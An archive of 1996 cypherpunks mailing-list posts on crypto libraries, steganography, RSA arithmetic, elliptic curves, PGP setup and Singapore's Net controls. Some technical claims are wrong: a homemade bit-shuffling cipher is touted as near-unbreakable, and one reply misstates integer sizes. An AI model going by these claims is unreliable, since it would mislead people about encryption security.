    ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/
 
  The Systemics Cryptix Cryptography Library in Java or Perl by Gary
  Howland - Java on Win95, WinNT, Solaris, Linux, Irix.
 
    http://www.systemics.com/software/
 
  The Cryptlib free Encryption Library in C by Peter Gutmann - Unix,
  DOS, windows (16 & 32 bit DLL available), Amiga
 
    http://www.cs.auckland.ac.nz/~pgut001/cryptlib.html
 

-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius libri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 30 Aug 1996 15:58:33 +0800
To: cypherpunks@toad.com
Subject: Re: Nuke Singapore Back into the Stone Age
Message-ID: <2.2.32.19960830031445.00ac0c80@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:55 PM 8/29/96 -0700, Timothy C. May wrote:

>As to why so many of the criticisms of such crackdowns use "weasel
>language," such as the example Jean-Francois disagrees with, well, this is
>the way the game is played. The alternative to "The government of Singapore
>fails to understand the nature of the Net and could do grievous harm to it"
>is not quite so diplomatic:
>
>"Fucking statists. Time to nuke 'em back to the stone age."

Additionally, such statements are not actually directed at the fascists they
are addressed to.  We are well aware that they won't pay any attention to
them.  They are addressed to private readers.  In that case a good mix of
polite argumentation by EFF-type groups and "nuke 'em 'till they glow then
shoot 'em in the dark" rhetoric from the rest of us is probably the optimal
mix.  The goal is to convince a critical mass of people to choose to
exercise the freedoms they possess because of all our toys here on the Net.
Since people are different, a broad spectrum of argumentation is indicated.

DCF

"What we seek is not the overthrow of the government but a situation in
which it gets lost in the shuffle."   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 30 Aug 1996 17:30:07 +0800
To: "ncognito@gate.net>
Subject: RE: Mimic Function Stego Programs?
Message-ID: <19960830062418937.AAA214@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 29 Aug 1996 16:34:05 -0400 (EDT), Damien Lucifer wrote:

>I've been working on a text steg'ing program for a while that operates 
>under a different premise, however. It keeps a dictionary of word pairs, 
>with each word in the pair being a synonym for the other.  It will read 
>which is why I never finished the decoder. Once i started encoding things, 
>and realizing how little could be hidden in this manner, I stopped working 

>At the moment the dictionary is very small; nearly all of the words are 
>relevant to only pornographic text (since porno is both predictable, and 
>repetitive, i thought it would be a good place to start). :) 
And it would let you hide stuff using a flood of Usenet alt.sex.stories posts
that could be forwarded somewhere....


It sounds mainly like your program is limited by the small dictionary size. 
Perhaps you could work up a front end that would make it very easy to extend
the dictionary?

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Fri, 30 Aug 1996 17:27:04 +0800
To: Scottauge@aol.com
Subject: Re: Exploring (RSA (001)
In-Reply-To: <960829223938_397314410@emout12.mail.aol.com>
Message-ID: <Pine.3.89.9608292351.A23180-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 29 Aug 1996 Scottauge@aol.com wrote:

> Exploring Rivest, Shamir, Adelman algorithm, but hoping someone out there is
> interested in very large number manipulations.
> 
> RSA suggests choosing two prime 100 digit numbers p and q for beginning of
> key generation.
> 
> These numbers are obviously beyond the long type of a C program.

Don't just assume that the long type is too small. For most compilers 
this is true, but the long data type (at least as I have seen the 
definition from ANSI 1991) is twice the base word (INT) length, where the 
word size is generally defined to be the size of the register length of the 
CPU in question to which the compiler has been developed for. Intel blurs 
this distinction by still supporting 8,16,32 and now 64 bit registers in 
the same CPU, and there are various flavors of the same C compiler that 
accomodate both 16 and 32 bit word sizes (read INT).

Just for the sake of arugment, an unsigned long in a 64 bit compiler 
represents integers from 0 to 2^128-1. This is fairly large. However, 
Fred Gruenburg (a RAND fellow) and some of his cohorts back in 1957 came 
up with a method of bit ticking that allowed them to calculated 
astronomically large prime numbers very quickly. It had something to do 
with a known mathematical progression of primes in the set of integer 
numbers as X -> 00. If I can find the information, I will post how he 
did it.

One other method involves using character strings to manipulate large 
numbers "long hand". This method is fairly slow compared to bit ticking, 
but it works and was used in some of the old style 8 bit systems I worked 
on many moons ago. You set up at least 3 long strings and use them as 
registers for all mathematical operations, plus allow for an overflow flag. 
This simulates some of the old style decimal machine in their operations.

> 
> Other than using Mathematica or Maple, I would like to use C or perferrably
> C++.
> 
> Just some basics such as multiplication, addition, subtraction, division,
> mod, etc over the Z set.
> 
> 

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Fri, 30 Aug 1996 17:56:18 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Code Review Guidelines (draft)
Message-ID: <199608300700.AAA09287@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:58 AM 8/29/96 -0500, Igor wrote:
>The decision that have just made is not a technical decision, it is 
>a business decision. You just decided that the needs of security 
>outweight the need to be able to deal with 100% of potential customers.

I strongly agree.  You've also potentially annoyed a bunch of Europeans,
Unicode-speakers, and other users of non-ASCII alphabets.
Just because the domain name in somebody's address is case-insensitive 
(and culturally-insensitive :-) ASCII, that doesn't mean their user
name will be also, especially if their _real_ mail system is some
ugly proprietary thing like Microso-Cc:PR0FS-HS.400 or if their
name is Swedish or Chinese.

> ..... X.400 ..... /OU=foo/O=bar/C=KREV/
(X.400 may be evil, but it does exist :-)

> [ ! is almost dead ]
! is still around, especially for gateways to proprietary mail systems.

You also need to add colon : and maybe comma , .



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Fri, 30 Aug 1996 17:28:51 +0800
To: Erle Greer <vagab0nd@sd.cybernex.net>
Subject: [NOISE] Re: Elliptic Curve Y**2 = x**3 + a * x**2 + b
Message-ID: <199608300707.AAA09423@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:38 PM 8/29/96 -0500, you wrote:
>> 1: How can I take the suqare root mod p ?
>
>This has what to do with CP?

Talking about actual implementation details for actual
cryptographic algorithms?  Very little these days*,
though I suppose Jim Bell has a solution for that....

[*Not that I'm necessarily in a position to bitch,
given the code-to-ranting ratio of my own postings :-)]

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 30 Aug 1996 17:26:06 +0800
To: Erle Greer <vagab0nd@sd.cybernex.net>
Subject: Re: Elliptic Curve Y**2 = x**3 + a * x**2 + b
In-Reply-To: <2.2.32.19960830023856.0075c734@mail.sd.cybernex.net>
Message-ID: <Pine.LNX.3.95.960830001224.623B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 29 Aug 1996, Erle Greer wrote:

> This has what to do with CP?

Elliptic curves have plenty to do with cryptography.  A web search should
turn up some useful information.  It's really quite fascinating if you can get
past some of the heavy math.  A tad more relevant to cpunks than black
helicopters, conspiracy theories, and such. 

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMiZrbizIPc7jvyFpAQGBzAf/dzSV77vAkJBHUM07PM0eErOeBW7tka5R
OMBr7fVsOkfQcFoHuZtJDawEumbuMmcOCsU45D4zRuwvMCmT+YTxU0ZMEf2n2oVk
ga/1hHJibyueZ5KHF4FgeX2dQJtodxA2mPxXA3j8lGPS7qoHy92oHHztjXF2LHQK
6wIqgqZS7LX2X6VPhL4DZ+xZ00CRquw/Ug7nk8M/KK3FmHyL6iAoGNhBryKMSva5
3WwKLxjbutK6BKN7JvAZOE7n/UGnNKXob1KV/vOl7oDeWacZoR84q0c+wOa6cM8R
uzXUEkw2C1oFTTqdBPE6AI+qtfUQQ1Tm2nwCTOLK5QpyIKQakY9ICg==
=s2ef
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 30 Aug 1996 18:03:46 +0800
To: cypherpunks@toad.com
Subject: Re: Errors-To: for cypherpunks
Message-ID: <199608300729.AAA09606@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> I am flooded by stupid "Mailbox is full" messages from Banyan and
> CC-mail gateways.

I suggest forwarding each and every one to the tech-support address at
Banyan or at CCMail.  If that doesn't work, send them to the president
of each company, until they fix their products to adhere to Internet
standards for where to send bounce messages.

You have to keep pushing each problem back to its source; that's the
only way they get fixed.

I had good luck at this with Microsoft; I reported their bogus Win95
email software that would, by default, insert gibberish at the bottom
of each message, to their tech support folks.  When that got no useful
response, I forwarded a copy of the bug report to
<billg@microsoft.com>, with a suggestion that having numerous
gibberish messages appearing daily in popular mailing list was making
Microsoft look like unresponsive novices in the Internet market.  Hmm,
the problem went away...

	John Gilmore
	postmaster@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Fri, 30 Aug 1996 21:41:09 +0800
To: cypherpunks@toad.com
Subject: Ian's Linux Filesystem Patches
Message-ID: <199608300740.AAA05386@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


I installed Ian's filesystem patches for Linux 2.0.11, and then patched the
kernel up to 2.0.15. Unfortunately I soon realized that the entire system 
grinds to a halt as the kernel performs cryptographic operations on a block
of data. 

I lack enough crypto expertise to fix this, but I believe it just needs to
be made preemptable, however that works. The filesystem patch, while a
definite step in the right direction, is all but useless in its present form.

For an idea of what I'm talking about, kill your turbo switch, or install on
a slow machine so that this is a bit more noticable. Users may want to kill
their internal chip cache. Patch the kernel up to 2.0.15, and install the 
kernel. Setup the loopback device as the README file states. Then make a 
filesystem on that device. The system will slow to a halt about the time that 
it actually needs to write some data to the filesystem, probably during the 
superblock write in mke2fs. Then, mount the filesystem and try to write a 
large block of data to the device. Again, it dies.

This will need to be fixed if everyone wants to install such a patch into
their kernel to reduce suspicion, or if it is to be included as standard in
the kernel source tree. I would fix this if I knew more about the way the
kernel is set up. I do fear making it preemptable may open a large can of
worms, at which point it may be more useful to implement this in userspace,
maybe by the creation of a seperate entry in the device hierarchy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Remailer Administrator <mix-admin@nym.alias.net>
Date: Fri, 30 Aug 1996 17:13:51 +0800
To: nobody@replay.com (Anonymous)
Subject: Re: PGP & Default
In-Reply-To: <199608300152.DAA18622@basement.replay.com>
Message-ID: <199608300513.BAA04332@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3944.1071713612.multipart/signed"

--Boundary..3944.1071713612.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

nobody@replay.com (Anonymous) writes:

>    I created a nym with a public key.  Now, it's become the default so
> when I go to send an encrypted message, I get prompted to enter the
> password for my nym key.
>    So, for the $64,000 question: How I can get my *original* public key (the one with my
> "real" email address) to again be the default.
>    Thx.

I assume you are talking about a nym.alias.net account, and that the
problem is when you want to sign a message with a key other than your
nym key?

Add a line like this

	MYNAME = <you@your.email.address>

to the file $HOME/.pgp/config.txt.  (Or wherever the equivalent is
under DOS.  Perhaps someone can tell me where the config.txt file
lives under DOS and I will add that to the help file.)


--Boundary..3944.1071713612.multipart/signed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjIK
CmlRQ1ZBd1VCTWlaNGNVVEJ0SFZpNThmUkFRRkcvd1FBcWxQTFF0YlFvSFF2
UzZib0ZIQ0R0Z3o0OWJxVGE3SnAKKzk3dnhITzA0UlJYVzhCVmVmTmt1aldM
YUszM0F1N1FobGhIVm9rWHcyZUxZNjR2cEVJS2NUbW5FRU04dTFsZgo4WFJq
M0tCNmNHNU5sLzI0RVZ3U2RVWUsvRVhYRGxpanAzdWZDTWg5WEU2Z1p2bGFV
ZDY0N0p2dFNaejBFdlFECjdvcDd5ZkdCZUV3PQo9VG0yaAotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Boundary..3944.1071713612.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 30 Aug 1996 16:00:49 +0800
To: cypherpunks@toad.com
Subject: LAT_ice
Message-ID: <199608300139.BAA03404@pipe6.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-23-96. Science: 
 
   "Lattices May Put Security Codes on a Firmer Footing." 
 
      Miklos Ajtai, a mathematician at IBM Almaden, has 
      provided the kind of guarantee of hardness that 
      cryptographers are looking for. He has proved that 
      examples picked at random from a particular class of 
      problems are, with exceedingly rare exceptions, as 
      hard to solve as the hardest ones imaginable. A code 
      that embedded messages in these problems so that only 
      someone equipped with the answers could decode them 
      would provide something close to a guarantee of 
      security. 
 
   8-29-96. WaJo: 
 
   "Cybersleuths Help Make Java Safe for Browsers." 
 
      Over the past year, Wallach, Dean, Felten and Balfanz  
      have become self-styled policemen for some of the 
      hottest Internet software around. Like many fellow 
      hackers, they find thrills in the search for others' 
      mistakes. But unlike some of their brethren, they're 
      using their skills to make the software better by 
      informing the companies of their findings, rather than 
      exploiting the errors maliciously. 
 
   ----- 
 
   http://pwp.usa.pipeline.com/~jya/latice.txt  (13kb for 2) 
 
   LAT_ice 
 
---------- 
 
   Seth Lloyd, MIT, has a 5-page report on "Universal  
   Quantum Simulators" in Science of 23 August, which  
   confirms Feynman's 1982 conjecture that quantum  
   computers can be programmed to simulate any local  
   quantum system. 
 
   There are quite a few equations so we have not scanned  
   it to .txt. However, we will scan as JPEG images for  
   those who are interested. 
 
   Send us a blank message with subject UQS_fey. 
    
   There will be a delay to honor knothead labor, me. 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 30 Aug 1996 20:10:51 +0800
To: cypherpunks@toad.com
Subject: Encryption
Message-ID: <3226ADC6.6C87@gte.net>
MIME-Version: 1.0
Content-Type: text/plain

It appears to me that PGP encryption et al is really 1940's technology, 
albeit fancied up by 1990's computers.  Why use keys and cyphers when 
all you should have to do is maximize the randomization of bits in a 
script?  Big computers should not be able to de-randomize such encoding, 
since the permutations/combinations would be astronomical after just a 
half-dozen or so random number initializations, as well as the fact that 
the bits are relatively undifferentiated (just ones and zeros) and are 
not maintained with their original bytes, words, paragraphs, or pages?


DALE THORN ON CRYPTOGRAPHY: ABSTRACT                            23 August 1996
------------------------------------------------------------------------------

Algorithm: Select bit-groups of random length from the file until the file is
           completely processed.  Shuffle the bits in each group randomly and
           save each group back to the file. Repeat if needed using different
           key-strings for each successive encryption, for increased security.

"If a high-speed computer could perform 'a trillion processor ops per second',
and it took just one millionth of a second to 'crack' my test file on such a
machine (i.e., a million ops), it would still require 10^36 ops to 'crack' 6
consecutive encodings, which translates to 10^24 seconds, or 3 x 10^16 years."

"Due to the nature of compounded bit-shuffling, no algorithm ever developed
or proposed could 'crack' multi-pass encoding with a single decryption pass.
In plain English, if a file were encoded six times (in six passes, with six
different password phrases), you'd have to decode all six passes before you
would know whether even the first decryption pass was successful or not."

"Since each byte in the encrypted file may contain bits from other 'original'
bytes, multi-pass encoding moves you rapidly in the direction of true-random
distribution of the source bits (note the 'Intelligent User' comment below)."

"My desktop computer (a 90 mhz Pentium) can encrypt a 12 kb file in less than
one second (in a single pass) using 'C', and takes less than two seconds with
the PDQ version of Basic I use, hence, the six passes that I normally perform
on such a file require nine seconds or less total computer time."

"One of the difficulties in breaking this type of encryption (other than the
numerical time factors) is the fact that you might have to deal with several
unknown random number generators from different compiled executable programs.
Add to this another factor, the 'Intelligent User' who adds their own tweaks
to the source code. The tweak is added, the program is compiled, the file(s)
are encrypted, and then the modified source code is destroyed along with the
executable file.  This type of modification, together with the fact that the
individual bits in the encrypted text file are scattered very effectively in
normal encoding, yields the ultimate level of security for concerned persons."

------------------------------------------------------------------------------
A SIMPLIFIED EXAMPLE FOR ENCRYPTION/DECRYPTION
------------------------------------------------------------------------------

We're going to encrypt the following 25-character text string:

   when_it_rains_it's_a_bath

The unencrypted string (in bit form, least significant bit at left) is:

   11101110000101101010011001110110111110101001011000
   10111011111010010011101000011010010110011101101100
   11101111101010010110001011101110010011001110111110
   10100001101111101001000110100001100010111000010110

We now generate 200 random numbers, and sort them in ascending order.
The following list represents the original physical positions of the
numbers, and we move the bits as shown above from these positions in
the 25-byte text string to bit positions 0, 1, 2, etc. (move bit #4
to the first position, move bit #179 to the second position, etc.).

     4 179  67 127  46  76 136  74  92  54
    88 121 134 192  77  36  47  26  45 144
   111 141 150  58 110  12  94  13 161 177
    18 155 153 175  91  95  86 195  79  20
    23 172  51  96 126  93  64   3 125  81
   166 131  71  63 170  78 140  87 107 147
    15  35  10 168  33 149 189 118  42  90
     6  85 120  68 102 173 103 104 138  83
    53  43 182 139  29  60 146 184 176 114
   123  44 191  56  70 185  73 137 148 199
   196  27  65  62  37 181  28   0 106 158
   100   1 190   2  25 194   8  30 174 101
   105 135 162  61  75  32 115 142  14  49
   186  50 183  21 119  52  69  99  11  89
    72  34  98 188  82  17 163   9 167 109
   113 171  38 157  84   5  59 178  22  57
   151 122 160 130  39 116 133 156 164  66
   159  40 124 193 108 180 152  41  97   7
   197 145 132 169  55  16  24 165 198 112
    19 129 187  31 154  48  80 128 117 143

The text string (in bit form) following the first encryption is now:

   10001010010000110111011110111010001011000001110010
   10000110110100101101110111010111101110100001100110
   01110101111111100111101001111011010110111101001000
   00110110110111001010011010101011010100110100001110

At this point, it's obvious (with a sufficient length of text to analyze) that
we could restore the original text using an algorithm equivalent to the pseudo-
random number generator we used above.  However, we're going to encrypt again:

Generate another 200 random numbers and sort them in ascending order.
The following list represents the original physical positions of the
numbers, so move the bits the same way we moved them above (move bit
#41 to the first position, move bit #9 to the second position, etc.).

    41   9  38  86  67 108   8  99 157  69
    91   6  15 150  28 192  56  98  54  72
   145  19  48  64 183 147 102   7 138 177
   167  29 164 176  97  82  83 168 181  95
   185  22  21  30  93 182 109  39 197  14
    96  40  84 137 155 143  16 126  58  33
   149 144 140 159  88 189   4 190 153  90
    68 114 129  45  53 112 119 125 127 124
    20 141 142  77 188 115 175 105  60 194
   106  80  31  49  51 116   1 113 151  94
     2 199 161 146  71 101  62  66 154 166
     3 128   5 118  10  61 110 165  43 122
    42  47 184  46 133  85  74 173  36  44
   111 171  89  35 163 136 162 198  17  23
    78 152 121  37  12 186  55 169 103  24
    34  26 178  87  81 123 132 195  65  11
   174 191 193 172  18  25 196 107 120 187
    27 100 180 134  59 135 179  57 148   0
    63  13 158 130  70 131 117 139  32 104
    92 170  50  76  73  79  75 160  52 156

The text string (in bit form) following the second encryption is now:

   01011100010110101100011110101000011101101111101011
   00101101100011111010010101111001011001000100000101
   00111101010101011011000011101111001111110101001011
   11101000001101101110101011000100111111000010111001

Now that we've doubly-encrypted the text string, try to describe an algorithm
that will restore the original string in a single decryption step, i.e., move
directly from the last-encoded text to the original text without the need for
an intermediate decryption step.

Text parsers and lexical analyzers won't do you any good in intermediate steps
as described above, since all intermediate encodings will be garbage text (not
only will the bits in each character be scrambled, but bits will be scrambled
across characters, words, and paragraphs as well.

Multi-step decryption could be facilitated where text can be analyzed a few
characters or words at a time, assuming the analysis engine could determine
from where to get the appropriate bits when processing a large text stream.

In the above examples of bit-level encryption, the individual bits migrate to
various places in the text string rather than remain within each set of eight
bits which DOS arbitrarily designates as character bytes. Therefore, the ONLY
tenable (but not necessarily viable) methods for decoding such text are:

   1. Try rearranging the bits randomly.  The disadvantages are:

      a. You could come up with "Mary had a little lamb...", etc., given
         that the bits are minimally differentiated (just ones and zeros).

      b. Decryption would require eons of time (an exponential factor of the
         number of bits processed, divided by the cycle time of the computer).

   2. Decrypt the text one step at a time, in the reverse order of the
      encryption steps.  The disadvantages are:

      a. You can't be sure you've decrypted any step correctly until decryption
         is completed (until all steps are performed and the text is readable).

      b. Passwords/phrases, algorithms, code routines, and even whole programs
         might change from step to step, thereby invalidating any 'single-pass'
         decryption scheme that's likely to be proposed.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 30 Aug 1996 19:37:47 +0800
To: cypherpunks@toad.com
Subject: Re: Elliptic Curve Y**2 = x**3 + a * x**2 + b
Message-ID: <ae4bfb5c03021004898e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 AM 8/30/96, Erle Greer wrote:
>> 1: How can I take the suqare root mod p ?
>
>This has what to do with CP?

Quite a lot, actually.

Elliptic curves closely describe the trajectories followed by Dark
Helicopters (known as "D-H" in cryptographic circles^H^H^H^H^H^Hellipses).
I observed Clinton's Dark Helicopter tracing an ellipse over my home just a
few weeks ago. (And the connections between the White House and the Ellipse
are too well known to comment upon.)

Speaking darkly, the leading algorithm is RSA, named after the Republic of
South Africa. Ellipses within ellipses form mandalas, so the connection
with RSA is all too obvious, even to a Sovok Bilderberger.

Ellipses also show up on the CP list in other ways...as when people elide
material and mark the elided material with "..."

For an alternate view of reality, look at Neal Koblitz's book "A Course in
Number Theory and Cryptography."


--Klaus







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mekdam@link.com.eg (Sherif  Mekdam)
Date: Fri, 30 Aug 1996 11:31:53 +0800
To: cypherpunks@toad.com
Subject: Desubscribe
In-Reply-To: <960829074816_512217624@emout15.mail.aol.com>
Message-ID: <32262333.4006@link.com.eg>
MIME-Version: 1.0
Content-Type: text/plain


> I would like you to desubscribe me from you mailing list





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 30 Aug 1996 17:48:25 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Errors-To: for cypherpunks
In-Reply-To: <199608300121.UAA31369@manifold.algebra.com>
Message-ID: <Pine.SUN.3.94.960830021207.14685D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 29 Aug 1996, Igor Chudov @ home wrote:

> Hi,
> 
> Whoever is in charge of maintaining this mailnig list, PLEASE
> add header 
> 
> Errors-To: cypherpunks-errors@toad.com
> 
> I am flooded by stupid "Mailbox is full" messages from Banyan and 
> CC-mail gateways.

Concur.

> 
> 	- Igor.
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 30 Aug 1996 17:28:52 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Re: New file system
Message-ID: <199608300642.CAA16656@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm not on the list currently, but I this person is looking for info on 
putting filesystems in other files and I no longer have the refs to 
what some members of the list were doing.

------- Forwarded Message Follows -------

At 12:38 PM 7/26/96 +0000, you wrote:
>On 26 Jul 96 at 3:07, free-dos@vpro.nl wrote:
>
>> I ask this here since I can't find anywhere else to ask this.
>
>> I'm looking for / thinking about writing a library that allows 
>> for a file system to exist inside of a single file (much 
>> like the microsoft OLE document).  This is needed for a project 
>> of mine.
>
>Check the Linux 2.0 distribution. I believe it allows this.  There's 
>also some cypherpunks talk recently about hiding encrypted 
>filesystems in other files, so you may want to check the archives in 
>hks.net.
>

Could you give me a good site to look into this? I tried coast.net with
no luck since the source is spread over a good number of directorys.



>> Requirements:   
>> 
>>    Mulitiple files and a hiarchial directory reside in a single
>> file.
>> 
>>    The file starts out as small as possible then it becomes 
>> bigger as more files and directorys are added to it.
>> 
>>    The files inside the file system can be added, renamed, 
>> delete, moved, fragged.  (there must be a way to defrag the 
>> files)
>> 
>>    Each file in the file system can have mulitiple streams much
>> like the NTFS file system.
>> 
>> End of requirements.
>> 
>>    Does anyone know of a library like this and if so where 
>> if not does anyone have any ideas on how this could work.  
>> Currently i'm looking at modiling the system after the 
>> UNIX file system.
>> 
>> Any ideas / comments please respond by email to:
>> hawk@idir.net.  
>> 
>> Use subject: 'Re: New file system'
>> 
>> 
>> e-mail: hawk@inf.net
> 

---
No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Fri, 30 Aug 1996 18:12:04 +0800
To: "Mark M." <trollins@interactive.visa.com
Subject: Re: Elliptic Curve Y**2 = x**3 + a * x**2 + b
Message-ID: <2.2.32.19960830073415.00750208@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 AM 8/30/96 -0400, you wrote:
>On Thu, 29 Aug 1996, Erle Greer wrote:
>
>> This has what to do with CP?
>
>Elliptic curves have plenty to do with cryptography.  A web search should
>turn up some useful information.  It's really quite fascinating if you can get
>past some of the heavy math.  A tad more relevant to cpunks than black
>helicopters, conspiracy theories, and such. 
>
>- -- Mark
>
Sorry, I guessed I jumped the gun.  I hate off-topic subjects that make this
list so huge.  Some of the off-topics indeed are interesting, but aren't
relevant.  My apologies to you, Tom.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 30 Aug 1996 18:10:01 +0800
To: cypherpunks@toad.com
Subject: RE: Desubscribe
In-Reply-To: <199608300019.RAA08156@adnetsol.adnetsol.com>
Message-ID: <mPogTD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ross Wright" <rwright@adnetsol.com> writes:

> On Or About: 29 Aug 96, 16:57, Dr.Dimitri Vulis KOTM wrote:
>
> > jbugden@smtplink.alis.ca writes:
>
> > > can not unsubscribe since majo= rdomo notices
> > > jbugden@smtplink.alis.ca in the header and treats the attempt to
> > > unsubscribe as a forgery.
> >
> > If you don't have the brains to forge the From:, then you have no
> > business being subscribed to any mailing list.
> >
>
> What's worse?  Losers who can't unsubscribe from a mailing list they
> subscribed to OR spammers?   ;-)

Whoever uses the term "spam" in derogatory manner, opposes free
speech and deserves to be caned.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 30 Aug 1996 12:33:30 +0800
To: cypherpunks@toad.com
Subject: PGP & Default
Message-ID: <199608300152.DAA18622@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



   I created a nym with a public key.  Now, it's become the default so
when I go to send an encrypted message, I get prompted to enter the
password for my nym key.
   So, for the $64,000 question: How I can get my *original* public key (the one with my
"real" email address) to again be the default.
   Thx.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 30 Aug 1996 19:39:57 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Singapore Global Action Alert (8/29/96)
Message-ID: <9608300819.AA22874@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 29 Aug 96 at 19:25, Declan McCullagh wrote:

> Bill speaks sooth. Personally, I agree with Jean-Francois in that
> the Singapore government *does* understand the Net, and is using
> that knowledge to control it within their borders reasonably well.
> Remember the next phase of restrictions goes into effect on
> September 15. 
> 
> But I don't see a problem in being polite the first time. 



Dear Declan.  This post is not personnally against you Declan.  I
like your posts.  Only, I don't agree with you last post.  And permit 
me to advance this: it is through an honnest error of yours that you 
have this opinion.

So, here it is:

I don't agree with you.  The world is being stangulated and
bloodsucked dry by peoples who are nothing but cheap shots.  It is
not a matter of being polite or not, it is a matter of saying things
as they really are.  It is a matter of acknowledging reality.  It is
a matter of integrity.

The best way to blow up their cheap littles looting schemes is to 
simply *say* the truth.  We live in an age where everybody is 
terrified of stating what everybody damn well know but tries as hard 
as they can to blank out.

By giving a simulacre (english word?), a make believe of moral 
sanction, you permit them to commit their crimes against human mind 
and life.  It is *us*, the producers, who grant them a recognition by 
being polite to them while they propose to eat us alive.  You 
wouldn't let a hiway robber to mug you without trying everything you 
can to prevent it, yet, you permit thoses statists leeches to 
confiscate an enormous part of your life, to rule an enormous part of 
your life, to define an enormous part of your life rules.

I grant much more respect to a bank robber than to a politician: the 
bank robber puts his own ass on the line, takes his own risks, and 
doesn't pretend he's doing it for you.  He is a robber but he makes 
no bones about it and he accepts the risks of the "trade".  Ask 
